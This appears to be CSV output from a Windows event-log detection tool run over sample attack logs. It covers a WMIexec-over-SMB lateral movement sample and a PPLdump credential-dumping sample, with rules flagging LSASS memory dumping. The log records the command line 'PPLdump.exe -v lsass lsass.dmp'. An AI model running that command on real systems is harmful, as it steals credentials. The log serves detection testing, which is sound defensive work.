+2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PPLdump.exe -v lsass lsass.dmp | Process: C:\Users\IEUser\Desktop\PPLdump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xbce3a | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:25.417 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:25.418 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:25.427 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1400 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 592 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010885D0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PPLdump.exe -v lsass lsass.dmp | LID: 0x3e7 | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.083 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x103801 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.084 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.dmp | Process: C:\Windows\system32\services.exe | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
